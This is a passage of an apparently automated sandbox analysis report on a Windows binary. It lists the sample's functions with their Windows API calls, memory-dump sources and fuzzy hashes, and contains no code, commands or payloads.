                                                                                                                                                                  • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                                                                                  • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                                                                                                                  Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: RectWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 861336768-0
                                                                                                                                                                  • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                                                                                  • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                                                                                                                  • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                                                                                  • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                                                                                                                  Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 004478E2
                                                                                                                                                                  • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                                                                                                                  • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                                                                                                                  • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                                                                                                                  • TrackPopupMenuEx.USER32(033164B0,00000000,00000000,?,?,00000000), ref: 00447991
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CursorMenuPopupTrack$Proc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1300944170-0
                                                                                                                                                                  • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                                                                                  • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                                                                                                                  • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                                                                                  • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                                                                                                                  Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004479CC
                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 004479D7
                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                                                                                                                  • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                                                                                                                  • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1822080540-0
                                                                                                                                                                  • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                                                                                  • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                                                                                                                  • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                                                                                  • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                                                                                                                  Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                                                                                  • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 659298297-0
                                                                                                                                                                  • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                                                                                  • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                                                                                                                  • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                                                                                  • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                                                                                                                  Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                                    • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                                                                                                                    • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                                                                                                                    • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                                                                                                                    • Part of subcall function 00440D98: SendMessageW.USER32(03311C00,000000F1,00000000,00000000), ref: 00440E6E
                                                                                                                                                                    • Part of subcall function 00440D98: SendMessageW.USER32(03311C00,000000F1,00000001,00000000), ref: 00440E9A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$EnableMessageSend$LongShow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 142311417-0
                                                                                                                                                                  • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                                                                                  • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                                                                                                                  • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                                                                                  • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                                                                                                                  Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                                                                  • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                                                                                                                  • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                                                                  • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                                                                                                                  Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                                                                                                                  • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                                                                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 245547762-0
                                                                                                                                                                  • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                                                                                  • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                                                                                                                  • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                                                                                  • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                                                                                                                  Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                                  • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                                  • BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Object$Select$BeginCreateDeletePath
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2338827641-0
                                                                                                                                                                  • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                                                                                  • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                                                                                                                  • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                                                                                  • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                                                                                                                  Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00434598
                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2875609808-0
                                                                                                                                                                  • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                                                                                  • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                                                                                                                  • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                                                                                  • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                                                                                                                                  Function 0041F5DC Relevance: 7.6, APIs: 5, Instructions: 54timethreadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0041F613
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 0041F61F
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0041F627
                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0041F62F
                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 0041F63B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1445889803-0
                                                                                                                                                                  • Opcode ID: 1135723e8045fd594a3b533cc5e145dd408aa02f7e9604b94c9c62fb4b922c37
                                                                                                                                                                  • Instruction ID: c7bf038de7359fae01b92e37b7086805794b770b917a01077a49d05dcccb2548
                                                                                                                                                                  • Opcode Fuzzy Hash: 1135723e8045fd594a3b533cc5e145dd408aa02f7e9604b94c9c62fb4b922c37
                                                                                                                                                                  • Instruction Fuzzy Hash: 7B11E572D002249FCB208BF8DD4869EB7F4EF18351F510A76D905E7220DA749D468788
                                                                                                                                                                  Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                                                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                                                                                                                  • MessageBeep.USER32(00000000), ref: 00460C46
                                                                                                                                                                  • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3741023627-0
                                                                                                                                                                  • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                                                                                  • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                                                                                                                  • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                                                                                  • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                                                                                                                  Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4023252218-0
                                                                                                                                                                  • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                                                                                  • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                                                                                                                  • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                                                                                  • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                                                                                                                  Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00455736
